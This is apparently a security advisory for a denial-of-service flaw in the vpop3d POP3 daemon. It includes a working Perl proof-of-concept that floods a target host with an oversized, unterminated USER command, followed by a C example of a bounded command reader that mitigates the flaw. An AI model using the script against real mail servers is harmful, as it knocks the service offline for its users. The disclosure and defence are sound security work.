Topic: vpop3d Denial of Service

Product: vpop3d

Note: This is implemented in several vhost packages, I can't name all of them, but vhost-3.05r3 is one.

Vendor Notification: Notified several vendors about the vpop3d binary they ship in their packages. The original author of vpop3d has been mailed; haven't had anything back yet.

Background:

/*
 * pop3d - IP/TCP/POP3 server for UNIX 4.3BSD
 * Post Office Protocol - Version 3 (RFC1225)
 *
 * (C) Copyright 1991 Regents of the University of California
 *
 */

Modified by various vendors to fit their needs; however, I have seen this flaw in several vhost software packages.

Problem Description: An attacker (remote or local) can cause a DoS on the vpop3d server with an over-long request. The server appears to sit waiting for the rest of the command, times out, and the daemon drops. Note this was tested locally, with the binary. Once we've hit it with our huge USER string it gives this message after 5 minutes or so, then dies:

"-ERR POP3 Server Abnormal Shutdown: Timeout waiting for command from client"

(The script below sends the string with no trailing CRLF, so the server never receives a complete command line before its idle timer expires, which is consistent with the message above.)

Impact: DoS of the vpop3d daemon; it then needs a manual restart.

Patch: Far too much to patch in this code!!!

NOTE: Thanks to Jake Fan for his input, his help tracking down the original author, and the fast reply. So thanks, Jake.

Exploit: Nothing special..

----------------------------------------------------------
#!/usr/bin/perl
# vpop3d Denial of Service..
# Proof of Concept script..
# Deadbeat, uk2sec..
# e: deadbeat@sdf.lonestar.org
# e: daniels@legend.co.uk
use strict;
use warnings;
use IO::Socket;

my $host = $ARGV[0];
my $port = $ARGV[1];
if (!$ARGV[1]) {
    die "usage: perl $0 <host> <port>\n";
}

# 40000 bytes of "%s%s" as the USER argument; sent with no CRLF, so the
# server never sees a complete command line
my $dos = "%s%s" x 5000;
my $req = "USER $dos";

my $sox = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerPort => $port,
    PeerAddr => $host
) or die "can't connect to $host : $port\n";
sleep 2;
print $sox $req;
sleep 1;
print "done..vpop3d should lock now :)\n";
------------------------------EOF-------------------------

Regards,
Deadbeat, uk2sec..
-------------------------------------
Deadbeat,
e: deadbeat@sdf.lonestar.org
e: daniels@legend.co.uk
-------------------------------------
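The bounded command reader below is an added example, not code from pop3d, vpop3d or any vhost package; it shows the server-side check a practitioner would want against the over-long USER line described above: cap the command line at the 255-octet limit RFC 2449 sets for POP3 commands and drop the client the moment it is exceeded, rather than waiting for a terminator that a hostile client never sends. The functions pop3_read_line, pop3_serve_command, build_oversized_user and feed_and_serve, the reply strings, and the pipe used as an offline stand-in for a client socket are all assumptions of this example.

```c
/* Added example: bounded POP3 command reader (not pop3d/vpop3d code). */
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

/* RFC 2449: a POP3 command line is at most 255 octets including CRLF. */
#define POP3_MAX_LINE 255

enum {
    LINE_OK       = 1,   /* a complete line is in buf */
    LINE_EOF      = 0,   /* peer closed without sending anything */
    LINE_IOERR    = -1,  /* read() failed */
    LINE_TOO_LONG = -2   /* limit hit before a terminator arrived */
};

/* Read one CRLF- or LF-terminated line from fd into buf (buflen bytes).
 * Reads a byte at a time so it never consumes past the line, and gives up
 * as soon as the limit is exceeded instead of draining input or waiting
 * for a CRLF that may never come (the advisory's PoC sends none). */
int pop3_read_line(int fd, char *buf, size_t buflen)
{
    size_t n = 0;
    for (;;) {
        char c;
        ssize_t r = read(fd, &c, 1);
        if (r < 0)
            return LINE_IOERR;
        if (r == 0) {                /* EOF */
            if (n == 0)
                return LINE_EOF;
            break;                   /* unterminated final line */
        }
        if (c == '\n')
            break;
        if (c == '\r')
            continue;
        if (n + 1 >= buflen) {       /* no room for this byte plus NUL */
            buf[n] = '\0';
            return LINE_TOO_LONG;
        }
        buf[n++] = c;
    }
    buf[n] = '\0';
    return LINE_OK;
}

/* Read and answer one command, writing the reply into resp (resplen bytes).
 * Returns 1 to keep the session open, 0 to close it. Only this client's
 * session ends on an over-long line; the daemon keeps accepting others. */
int pop3_serve_command(int fd, char *resp, size_t resplen)
{
    char line[POP3_MAX_LINE + 1];
    int rc = pop3_read_line(fd, line, sizeof line);

    if (rc == LINE_TOO_LONG) {
        snprintf(resp, resplen, "-ERR command line too long");
        return 0;
    }
    if (rc != LINE_OK) {             /* EOF or I/O error: nothing to say */
        resp[0] = '\0';
        return 0;
    }
    if (strncasecmp(line, "USER ", 5) == 0 && line[5] != '\0') {
        snprintf(resp, resplen, "+OK name is a valid mailbox");
    } else if (strcasecmp(line, "QUIT") == 0) {
        snprintf(resp, resplen, "+OK");
        return 0;
    } else {
        snprintf(resp, resplen, "-ERR unknown command");
    }
    return 1;
}

/* Constructed input in the shape of the advisory's payload: "USER " plus
 * "%s%s" repeats and no CRLF, filling out to outlen-1 bytes plus NUL.
 * Returns the payload length (0 if out is too small). */
size_t build_oversized_user(char *out, size_t outlen)
{
    const char *fill = "%s%s";
    size_t n = 5;
    if (outlen < 6)
        return 0;
    memcpy(out, "USER ", 5);
    while (n < outlen - 1) {
        out[n] = fill[n % 4];
        n++;
    }
    out[n] = '\0';
    return n;
}

/* Offline stand-in for a client socket: push the bytes through a pipe,
 * close the write side (the client hangs up), and serve one command. */
int feed_and_serve(const char *data, size_t len, char *resp, size_t resplen)
{
    int fds[2], keep;
    if (pipe(fds) != 0)
        return -1;
    if (write(fds[1], data, len) != (ssize_t)len) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    close(fds[1]);
    keep = pop3_serve_command(fds[0], resp, resplen);
    close(fds[0]);
    return keep;
}

int main(void)
{
    char resp[64], big[4096];
    const char *ok = "USER deadbeat\r\n";
    size_t n = build_oversized_user(big, sizeof big);
    printf("normal USER:    keep=%d reply=%s\n",
           feed_and_serve(ok, strlen(ok), resp, sizeof resp), resp);
    printf("oversized USER: keep=%d reply=%s\n",
           feed_and_serve(big, n, resp, sizeof resp), resp);
    return 0;
}
```

The design point is that an unauthenticated client gets a fixed byte budget per command and no chance to park the server in a read that only an idle timer ends; the reader returns on the 256th byte of the oversized line, the session is answered with -ERR and closed, and a separate accept loop (or inetd) is untouched. A real daemon still needs the idle timeout for clients that send nothing at all, but that timeout should end one session, not the daemon, which is the behaviour the advisory reports.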